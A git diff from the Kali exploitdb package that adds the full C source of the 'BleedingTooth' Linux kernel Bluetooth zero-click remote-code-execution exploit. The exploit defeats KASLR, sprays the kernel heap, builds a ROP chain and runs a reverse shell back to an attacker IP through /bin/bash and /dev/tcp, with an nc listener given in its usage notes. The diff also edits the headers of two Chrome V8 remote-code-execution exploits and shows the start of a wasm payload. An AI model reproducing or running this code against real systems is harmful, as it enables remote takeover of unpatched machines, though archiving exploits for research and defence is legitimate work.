diff --git a/debian/changelog b/debian/changelog
index 6b6cd0450..df8b41f86 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,5 +1,8 @@
-exploitdb (20210407-0kali1) UNRELEASED; urgency=low
- -- Kali Janitor <janitor@kali.org>  Wed, 07 Apr 2021 15:47:02 -0000
+exploitdb (20210410-0kali1) UNRELEASED; urgency=low
+
+  * New upstream release.
+
+ -- Kali Janitor <janitor@kali.org>  Sat, 10 Apr 2021 10:13:23 -0000
 
 exploitdb (20210330-0kali1) kali-dev; urgency=medium
 
diff --git a/exploits/linux/remote/49754.c b/exploits/linux/remote/49754.c
new file mode 100644
index 000000000..7793aa5c8
--- /dev/null
+++ b/exploits/linux/remote/49754.c
@@ -0,0 +1,604 @@
+# Exploit Title: Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution
+# Date: 06/04/2020
+# Exploit Author: Google Security Research (Andy Nguyen)
+# Tested on: 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+# CVE : CVE-2020-12351, CVE-2020-12352
+
+/*
+ * BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution
+ * by Andy Nguyen (theflow@)
+ *
+ * This Proof-Of-Concept demonstrates the exploitation of
+ * CVE-2020-12351 and CVE-2020-12352.
+ *
+ * Compile using:
+ *   $ gcc -o exploit exploit.c -lbluetooth
+ *
+ * and execute as:
+ *   $ sudo ./exploit target_mac source_ip source_port
+ *
+ * In another terminal, run:
+ *   $ nc -lvp 1337
+ *   exec bash -i 2>&0 1>&0
+ *
+ * If successful, a calc can be spawned with:
+ *   export XAUTHORITY=/run/user/1000/gdm/Xauthority
+ *   export DISPLAY=:0
+ *   gnome-calculator
+ *
+ * This Proof-Of-Concept has been tested against a Dell XPS 15 running
+ * Ubuntu 20.04.1 LTS with:
+ * - 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020
+ *   x86_64 x86_64 x86_64 GNU/Linux
+ *
+ * The success rate of the exploit is estimated at 80%.
+ */
+
+#include <bluetooth/bluetooth.h>
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+#include <bluetooth/l2cap.h>
+#include <errno.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/uio.h>
+#include <unistd.h>
+
+#define REMOTE_COMMAND "/bin/bash -c /bin/bash</dev/tcp/%s/%s"
+
+// Increase if the heap spray is not reliable.
+#define NUM_SPRAY_KMALLOC_1024 6
+#define NUM_SPRAY_KMALLOC_128 6
+
+// Increase if stuck at sending packets.
+#define HCI_SEND_ACL_DATA_WAIT_USEC 5000
+
+#define KERNEL_TEXT_BASE 0xffffffff81000000
+
+#define KERNEL_UBUNTU_5_4_0_48 1
+
+#ifdef KERNEL_UBUNTU_5_4_0_48
+#define PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET 0xffffffff81567f46
+#define POP_RAX_RET 0xffffffff8103d0b1
+#define POP_RDI_RET 0xffffffff8108efa0
+#define JMP_RAX 0xffffffff8100005b
+#define RUN_CMD 0xffffffff810ce470
+#define DO_TASK_DEAD 0xffffffff810dc260
+
+#define KASLR_DEFEAT(kaslr_offset, kernel_addr)                                \
+  do {                                                                         \
+    if ((kernel_addr & 0xfffff) == 0xf4d8e)                                    \
+      kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xf4d8e;                 \
+    else                                                                       \
+      kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xc001a4;                \
+  } while (0)
+#else
+#error "No kernel version defined"
+#endif
+
+#define L2CAP_IDENT 0x41
+
+#define SIGNALLING_CID 0x01
+#define AMP_MGR_CID 0x03
+
+typedef struct {
+  uint8_t code;
+  uint8_t ident;
+  uint16_t len;
+} __attribute__((packed)) a2mp_hdr;
+#define A2MP_HDR_SIZE 4
+
+#define A2MP_COMMAND_REJ 0x01
+typedef struct {
+  uint16_t reason;
+} __attribute__((packed)) a2mp_command_rej;
+
+#define A2MP_INFO_REQ 0x06
+typedef struct {
+  uint8_t id;
+} __attribute__((packed)) a2mp_info_req;
+
+#define A2MP_INFO_RSP 0x07
+typedef struct {
+  uint8_t id;
+  uint8_t status;
+  uint32_t total_bw;
+  uint32_t max_bw;
+  uint32_t min_latency;
+  uint16_t pal_caps;
+  uint16_t assoc_size;
+} __attribute__((packed)) a2mp_info_rsp;
+
+#define A2MP_ASSOC_REQ 0x08
+typedef struct {
+  uint8_t id;
+} __attribute__((packed)) a2mp_assoc_req;
+
+#define A2MP_ASSOC_RSP 0x09
+typedef struct {
+  uint8_t id;
+  uint8_t status;
+  uint8_t assoc_data[0];
+} __attribute__((packed)) a2mp_assoc_rsp;
+
+typedef struct {
+  uint8_t mode;
+  uint8_t txwin_size;
+  uint8_t max_transmit;
+  uint16_t retrans_timeout;
+  uint16_t monitor_timeout;
+  uint16_t max_pdu_size;
+} __attribute__((packed)) l2cap_conf_rfc;
+
+static char remote_command[64];
+
+static int hci_sock = 0, l2_sock = 0;
+static uint16_t hci_handle = 0;
+
+static uint64_t kaslr_offset = 0, l2cap_chan_addr = 0;
+
+static uint16_t crc16_tab[] = {
+    0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241, 0xC601,
+    0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440, 0xCC01, 0x0CC0,
+    0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40, 0x0A00, 0xCAC1, 0xCB81,
+    0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841, 0xD801, 0x18C0, 0x1980, 0xD941,
+    0x1B00, 0xDBC1, 0xDA81, 0x1A40, 0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01,
+    0x1DC0, 0x1C80, 0xDC41, 0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0,
+    0x1680, 0xD641, 0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081,
+    0x1040, 0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,
+    0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441, 0x3C00,
+    0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41, 0xFA01, 0x3AC0,
+    0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840, 0x2800, 0xE8C1, 0xE981,
+    0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41, 0xEE01, 0x2EC0, 0x2F80, 0xEF41,
+    0x2D00, 0xEDC1, 0xEC81, 0x2C40, 0xE401, 0x24C0, 0x2580, 0xE541, 0x2700,
+    0xE7C1, 0xE681, 0x2640, 0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0,
+    0x2080, 0xE041, 0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281,
+    0x6240, 0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,
+    0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41, 0xAA01,
+    0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840, 0x7800, 0xB8C1,
+    0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41, 0xBE01, 0x7EC0, 0x7F80,
+    0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40, 0xB401, 0x74C0, 0x7580, 0xB541,
+    0x7700, 0xB7C1, 0xB681, 0x7640, 0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101,
+    0x71C0, 0x7080, 0xB041, 0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0,
+    0x5280, 0x9241, 0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481,
+    0x5440, 0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,
+    0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841, 0x8801,
+    0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40, 0x4E00, 0x8EC1,
+    0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41, 0x4400, 0x84C1, 0x8581,
+    0x4540, 0x8701, 0x47C0, 0x4680, 0x8641, 0x8201, 0x42C0, 0x4380, 0x8341,
+    0x4100, 0x81C1, 0x8081, 0x4040,
+};
+
+static uint16_t crc16(uint16_t crc, const void *buf, size_t size) {
+  const uint8_t *p = buf;
+  while (size--)
+    crc = crc16_tab[(crc ^ (*p++)) & 0xff] ^ (crc >> 8);
+  return crc;
+}
+
+static int connect_l2cap(bdaddr_t dst_addr, uint16_t *handle) {
+  int l2_sock;
+
+  if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) {
+    perror("[-] socket");
+    exit(1);
+  }
+
+  struct sockaddr_l2 laddr = {0};
+  laddr.l2_family = AF_BLUETOOTH;
+  memcpy(&laddr.l2_bdaddr, BDADDR_ANY, sizeof(bdaddr_t));
+  if (bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0) {
+    perror("[-] bind");
+    exit(1);
+  }
+
+  struct sockaddr_l2 raddr = {0};
+  raddr.l2_family = AF_BLUETOOTH;
+  raddr.l2_bdaddr = dst_addr;
+  if (connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr)) < 0 &&
+      errno != EALREADY) {
+    perror("[-] connect");
+    exit(1);
+  }
+
+  struct l2cap_conninfo conninfo = {0};
+  socklen_t len = sizeof(conninfo);
+  if (getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &conninfo, &len) < 0) {
+    perror("[-] getsockopt");
+    exit(1);
+  }
+
+  if (handle)
+    *handle = conninfo.hci_handle;
+
+  return l2_sock;
+}
+
+static int connect_hci(void) {
+  struct hci_dev_info di = {0};
+  int hci_device_id = hci_get_route(NULL);
+  int hci_sock = hci_open_dev(hci_device_id);
+  if (hci_devinfo(hci_device_id, &di) < 0) {
+    perror("[-] hci_devinfo");
+    exit(1);
+  }
+
+  struct hci_filter flt = {0};
+  hci_filter_clear(&flt);
+  hci_filter_all_ptypes(&flt);
+  hci_filter_all_events(&flt);
+  if (setsockopt(hci_sock, SOL_HCI, HCI_FILTER, &flt, sizeof(flt)) < 0) {
+    perror("[-] setsockopt(HCI_FILTER)");
+    exit(1);
+  }
+
+  return hci_sock;
+}
+
+static void wait_event_complete_packet(void) {
+  while (1) {
+    uint8_t buf[256] = {0};
+    if (read(hci_sock, buf, sizeof(buf)) < 0) {
+      perror("[-] read");
+      exit(1);
+    }
+    if (buf[0] == HCI_EVENT_PKT) {
+      hci_event_hdr *hdr = (hci_event_hdr *)&buf[1];
+      if (btohs(hdr->evt) == EVT_NUM_COMP_PKTS)
+        break;
+    }
+  }
+}
+
+static void hci_send_acl_data(int hci_sock, uint16_t hci_handle, void *data,
+                              uint16_t data_length, uint16_t flags) {
+  uint8_t type = HCI_ACLDATA_PKT;
+
+  hci_acl_hdr hdr = {0};
+  hdr.handle = htobs(acl_handle_pack(hci_handle, flags));
+  hdr.dlen = data_length;
+
+  struct iovec iv[3] = {0};
+  iv[0].iov_base = &type;
+  iv[0].iov_len = sizeof(type);
+  iv[1].iov_base = &hdr;
+  iv[1].iov_len = HCI_ACL_HDR_SIZE;
+  iv[2].iov_base = data;
+  iv[2].iov_len = data_length;
+  if (writev(hci_sock, iv, sizeof(iv) / sizeof(struct iovec)) < 0) {
+    perror("[-] writev");
+    exit(1);
+  }
+
+  usleep(HCI_SEND_ACL_DATA_WAIT_USEC);
+  wait_event_complete_packet();
+}
+
+static void disconnect_a2mp(void) {
+  printf("[*] Disconnecting A2MP channel...\n");
+
+  struct {
+    l2cap_hdr hdr;
+    l2cap_cmd_hdr cmd_hdr;
+    l2cap_disconn_req disconn_req;
+  } disconn_req = {0};
+  disconn_req.hdr.len = htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE);
+  disconn_req.hdr.cid = htobs(SIGNALLING_CID);
+  disconn_req.cmd_hdr.code = L2CAP_DISCONN_REQ;
+  disconn_req.cmd_hdr.ident = L2CAP_IDENT;
+  disconn_req.cmd_hdr.len =
+      htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
+  disconn_req.disconn_req.dcid = htobs(AMP_MGR_CID);
+  disconn_req.disconn_req.scid = htobs(AMP_MGR_CID);
+  hci_send_acl_data(hci_sock, hci_handle, &disconn_req, sizeof(disconn_req), 2);
+}
+
+static void connect_a2mp(void) {
+  printf("[*] Connecting A2MP channel...\n");
+
+  struct {
+    l2cap_hdr hdr;
+  } a2mp_create = {0};
+  a2mp_create.hdr.len = htobs(sizeof(a2mp_create) - L2CAP_HDR_SIZE);
+  a2mp_create.hdr.cid = htobs(AMP_MGR_CID);
+  hci_send_acl_data(hci_sock, hci_handle, &a2mp_create, sizeof(a2mp_create), 2);
+
+  // Configure to L2CAP_MODE_BASIC and max MTU.
+  struct {
+    l2cap_hdr hdr;
+    l2cap_cmd_hdr cmd_hdr;
+    l2cap_conf_rsp conf_rsp;
+    l2cap_conf_opt conf_opt;
+    l2cap_conf_rfc conf_rfc;
+    l2cap_conf_opt conf_opt2;
+    uint16_t conf_mtu;
+  } conf_rsp = {0};
+  conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE);
+  conf_rsp.hdr.cid = htobs(SIGNALLING_CID);
+  conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP;
+  conf_rsp.cmd_hdr.ident = L2CAP_IDENT;
+  conf_rsp.cmd_hdr.len =
+      htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
+  conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID);
+  conf_rsp.conf_rsp.flags = htobs(0);
+  conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT);
+  conf_rsp.conf_opt.type = L2CAP_CONF_RFC;
+  conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc);
+  conf_rsp.conf_rfc.mode = L2CAP_MODE_BASIC;
+  conf_rsp.conf_opt2.type = L2CAP_CONF_MTU;
+  conf_rsp.conf_opt2.len = sizeof(uint16_t);
+  conf_rsp.conf_mtu = htobs(0xffff);
+  hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2);
+}
+
+static void prepare_l2cap_chan_addr_leak(void) {
+  printf("[*] Preparing to leak l2cap_chan address...\n");
+
+  struct {
+    l2cap_hdr hdr;
+    l2cap_cmd_hdr cmd_hdr;
+    l2cap_conf_rsp conf_rsp;
+    l2cap_conf_opt conf_opt;
+    l2cap_conf_rfc conf_rfc;
+  } conf_rsp = {0};
+  conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE);
+  conf_rsp.hdr.cid = htobs(SIGNALLING_CID);
+  conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP;
+  conf_rsp.cmd_hdr.ident = L2CAP_IDENT;
+  conf_rsp.cmd_hdr.len =
+      htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
+  conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID);
+  conf_rsp.conf_rsp.flags = htobs(0);
+  conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT);
+  conf_rsp.conf_opt.type = L2CAP_CONF_RFC;
+  conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc);
+  conf_rsp.conf_rfc.mode = L2CAP_MODE_ERTM;
+  hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2);
+}
+
+static uint64_t leak_kstack(void) {
+  printf("[*] Leaking A2MP kernel stack memory...\n");
+
+  struct {
+    l2cap_hdr hdr;
+    a2mp_hdr amp_hdr;
+    a2mp_info_req info_req;
+  } info_req = {0};
+  info_req.hdr.len = htobs(sizeof(info_req) - L2CAP_HDR_SIZE);
+  info_req.hdr.cid = htobs(AMP_MGR_CID);
+  info_req.amp_hdr.code = A2MP_INFO_REQ;
+  info_req.amp_hdr.ident = L2CAP_IDENT;
+  info_req.amp_hdr.len =
+      htobs(sizeof(info_req) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
+  // Use a dummy id to make hci_dev_get() fail.
+  info_req.info_req.id = 0x42;
+  hci_send_acl_data(hci_sock, hci_handle, &info_req, sizeof(info_req), 2);
+
+  while (1) {
+    uint8_t buf[256] = {0};
+    if (read(hci_sock, buf, sizeof(buf)) < 0) {
+      perror("[-] read");
+      exit(1);
+    }
+    if (buf[0] == HCI_ACLDATA_PKT) {
+      l2cap_hdr *l2_hdr = (l2cap_hdr *)&buf[5];
+      if (btohs(l2_hdr->cid) == AMP_MGR_CID) {
+        a2mp_hdr *amp_hdr = (a2mp_hdr *)&buf[9];
+        if (amp_hdr->code == A2MP_INFO_RSP)
+          return *(uint64_t *)&buf[21];
+      }
+    }
+  }
+
+  return 0;
+}
+
+static void trigger_type_confusion(void) {
+  struct {
+    l2cap_hdr hdr;
+    uint16_t ctrl;
+    a2mp_hdr amp_hdr;
+    a2mp_command_rej cmd_rej;
+    uint16_t fcs;
+  } cmd_rej = {0};
+  cmd_rej.hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE);
+  cmd_rej.hdr.cid = htobs(AMP_MGR_CID);
+  cmd_rej.ctrl = 0xffff;
+  cmd_rej.amp_hdr.code = A2MP_COMMAND_REJ;
+  cmd_rej.amp_hdr.ident = L2CAP_IDENT;
+  cmd_rej.amp_hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE -
+                              sizeof(a2mp_hdr) - sizeof(uint32_t));
+  cmd_rej.cmd_rej.reason = 0;
+  cmd_rej.fcs = crc16(0, &cmd_rej, sizeof(cmd_rej) - sizeof(uint16_t));
+  hci_send_acl_data(hci_sock, hci_handle, &cmd_rej, sizeof(cmd_rej), 2);
+}
+
+static void build_krop(uint64_t *rop, uint64_t cmd_addr) {
+  *rop++ = kaslr_offset + POP_RAX_RET;
+  *rop++ = kaslr_offset + RUN_CMD;
+  *rop++ = kaslr_offset + POP_RDI_RET;
+  *rop++ = cmd_addr;
+  *rop++ = kaslr_offset + JMP_RAX;
+  *rop++ = kaslr_offset + POP_RAX_RET;
+  *rop++ = kaslr_offset + DO_TASK_DEAD;
+  *rop++ = kaslr_offset + JMP_RAX;
+}
+
+static void build_payload(uint8_t data[0x400]) {
+  // Fake sk_filter object starting at offset 0x300.
+  *(uint64_t *)&data[0x318] = l2cap_chan_addr + 0x320; // prog
+
+  // Fake bpf_prog object starting at offset 0x320.
+  // RBX points to the amp_mgr object.
+  *(uint64_t *)&data[0x350] =
+      kaslr_offset +
+      PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET; // bpf_func
+  *(uint64_t *)&data[0x358] = 0xDEADBEEF;                  // rbp
+
+  // Build kernel ROP chain that executes run_cmd() from kernel/reboot.c.
+  // Note that when executing the ROP chain, the data below in memory will be
+  // overwritten. Therefore, the argument should be located after the ROP chain.
+  build_krop((uint64_t *)&data[0x360], l2cap_chan_addr + 0x3c0);
+  strncpy(&data[0x3c0], remote_command, 0x40);
+}
+
+static void spray_kmalloc_1024(int num) {
+  // Skip first two hci devices because they may be legit.
+  for (int i = 2; i < num + 2; i++) {
+    printf("\r[*] Sending packet with id #%d...", i);
+    fflush(stdout);
+
+    struct {
+      l2cap_hdr hdr;
+      a2mp_hdr amp_hdr;
+      a2mp_info_rsp info_rsp;
+    } info_rsp = {0};
+    info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE);
+    info_rsp.hdr.cid = htobs(AMP_MGR_CID);
+    info_rsp.amp_hdr.code = A2MP_INFO_RSP;
+    info_rsp.amp_hdr.ident = L2CAP_IDENT;
+    info_rsp.amp_hdr.len =
+        htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
+    info_rsp.info_rsp.id = i;
+    hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2);
+
+    struct {
+      l2cap_hdr hdr;
+      a2mp_hdr amp_hdr;
+      a2mp_assoc_rsp assoc_rsp;
+      uint8_t data[0x400];
+    } assoc_rsp = {0};
+    assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE);
+    assoc_rsp.hdr.cid = htobs(AMP_MGR_CID);
+    assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP;
+    assoc_rsp.amp_hdr.ident = L2CAP_IDENT;
+    assoc_rsp.amp_hdr.len =
+        htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
+    assoc_rsp.assoc_rsp.id = i;
+    for (int j = 0; j < sizeof(assoc_rsp.data); j += 8)
+      memset(&assoc_rsp.data[j], 'A' + j / 8, 8);
+    build_payload(assoc_rsp.data);
+
+    // Send fragmented l2cap packets (assume ACL MTU is at least 256 bytes).
+    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp,
+                      sizeof(assoc_rsp) - sizeof(assoc_rsp.data), 2);
+    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x000], 0x100, 1);
+    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x100], 0x100, 1);
+    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x200], 0x100, 1);
+    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x300], 0x100, 1);
+  }
+
+  printf("\n");
+}
+
+static void spray_kmalloc_128(int num) {
+  // Skip first two hci devices because they may be legit.
+  for (int i = 2; i < num + 2; i++) {
+    printf("\r[*] Sending packet with id #%d...", i);
+    fflush(stdout);
+
+    struct {
+      l2cap_hdr hdr;
+      a2mp_hdr amp_hdr;
+      a2mp_info_rsp info_rsp;
+    } info_rsp = {0};
+    info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE);
+    info_rsp.hdr.cid = htobs(AMP_MGR_CID);
+    info_rsp.amp_hdr.code = A2MP_INFO_RSP;
+    info_rsp.amp_hdr.ident = L2CAP_IDENT;
+    info_rsp.amp_hdr.len =
+        htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
+    info_rsp.info_rsp.id = i;
+    hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2);
+
+    struct {
+      l2cap_hdr hdr;
+      a2mp_hdr amp_hdr;
+      a2mp_assoc_rsp assoc_rsp;
+      uint8_t data[0x80];
+    } assoc_rsp = {0};
+    assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE);
+    assoc_rsp.hdr.cid = htobs(AMP_MGR_CID);
+    assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP;
+    assoc_rsp.amp_hdr.ident = L2CAP_IDENT;
+    assoc_rsp.amp_hdr.len =
+        htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
+    assoc_rsp.assoc_rsp.id = i;
+    for (int j = 0; j < sizeof(assoc_rsp.data); j += 8)
+      memset(&assoc_rsp.data[j], 'A' + j / 8, 8);
+    // Fake sock object.
+    *(uint64_t *)&assoc_rsp.data[0x10] = l2cap_chan_addr + 0x300; // sk_filter
+    hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp, sizeof(assoc_rsp), 2);
+  }
+
+  printf("\n");
+}
+
+int main(int argc, char *argv[]) {
+  if (argc != 4) {
+    printf("Usage: %s target_mac source_ip source_port\n", argv[0]);
+    exit(1);
+  }
+
+  bdaddr_t dst_addr = {0};
+  str2ba(argv[1], &dst_addr);
+
+  snprintf(remote_command, sizeof(remote_command), REMOTE_COMMAND, argv[2],
+           argv[3]);
+  printf("[+] Remote command: %s\n", remote_command);
+
+  printf("[*] Opening hci device...\n");
+  hci_sock = connect_hci();
+
+  printf("[*] Connecting to victim...\n");
+  l2_sock = connect_l2cap(dst_addr, &hci_handle);
+  printf("[+] HCI handle: %x\n", hci_handle);
+
+  connect_a2mp();
+
+  uint64_t kernel_addr = leak_kstack();
+  printf("[+] Kernel address: %lx\n", kernel_addr);
+  KASLR_DEFEAT(kaslr_offset, kernel_addr);
+  printf("[+] KASLR offset: %lx\n", kaslr_offset);
+  if ((kaslr_offset & 0xfffff) != 0) {
+    printf("[-] Error KASLR offset is invalid.\n");
+    exit(1);
+  }
+
+  prepare_l2cap_chan_addr_leak();
+  l2cap_chan_addr = leak_kstack() - 0x110;
+  printf("[+] l2cap_chan address: %lx\n", l2cap_chan_addr);
+  if ((l2cap_chan_addr & 0xff) != 0) {
+    printf("[-] Error l2cap_chan address is invalid.\n");
+    exit(1);
+  }
+
+  // Somehow, spraying a bit before makes the UaF more reliable.
+  printf("[*] Spraying kmalloc-1024...\n");
+  spray_kmalloc_1024(0x40);
+
+  // Disconnect to free the l2cap_chan object, then reconnect.
+  disconnect_a2mp();
+  connect_a2mp();
+
+  // Attempt to reclaim the freed l2cap_chan object.
+  printf("[*] Spraying kmalloc-1024...\n");
+  for (int i = 0; i < NUM_SPRAY_KMALLOC_1024; i++) {
+    spray_kmalloc_1024(0x40);
+  }
+
+  // Attempt to control the out-of-bounds read.
+  printf("[*] Spraying kmalloc-128...\n");
+  for (int i = 0; i < NUM_SPRAY_KMALLOC_128; i++) {
+    spray_kmalloc_128(0x40);
+  }
+
+  printf("[*] Triggering remote code execution...\n");
+  disconnect_a2mp();
+  trigger_type_confusion();
+
+  close(l2_sock);
+  hci_close_dev(hci_sock);
+
+  return 0;
+}
\ No newline at end of file
diff --git a/exploits/multiple/remote/49745.js b/exploits/multiple/remote/49745.js
index da4ccf84d..e8b6ee526 100644
--- a/exploits/multiple/remote/49745.js
+++ b/exploits/multiple/remote/49745.js
@@ -1,15 +1,38 @@
 # Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution
-# Date: 05/04/2021
-# Exploit Author: Tobias Marcotto
-# Original Author: r4j0x00
-# Tested on: Kali Linux x64 
-# Version: 87.0.4280.88
+# Exploit Author: r4j0x00
+# Version: < 87.0.4280.88
 # Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
 # CVE: CVE-2020-16040
-# Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/
 
-*********************************************************************************************************
+/*
+BSD 2-Clause License
 
+Copyright (c) 2021, rajvardhan agarwal
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+// Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/
 
 var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
 var wasm_mod = new WebAssembly.Module(wasm_code);
diff --git a/exploits/multiple/remote/49746.js b/exploits/multiple/remote/49746.js
index 1f59d0927..f458a5181 100644
--- a/exploits/multiple/remote/49746.js
+++ b/exploits/multiple/remote/49746.js
@@ -1,15 +1,36 @@
 # Exploit Title: Google Chrome 81.0.4044 V8 - Remote Code Execution
-# Date: 05/04/2021
-# Exploit Author: Tobias Marcotto
-# Original Author: r4j0x00
-# Tested on: Kali Linux x64 
-# Version: 83.0.4103.106
+# Exploit Author: r4j0x00
+# Version: < 83.0.4103.106
 # Description: Out of bounds write in V8 in Google Chrome prior to 83.0.4103.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
 # CVE: CVE-2020-6507
 
-
-*********************************************************************************************************
-
+/*
+BSD 2-Clause License
+
+Copyright (c) 2021, rajvardhan agarwal
+All rights reserved.
+
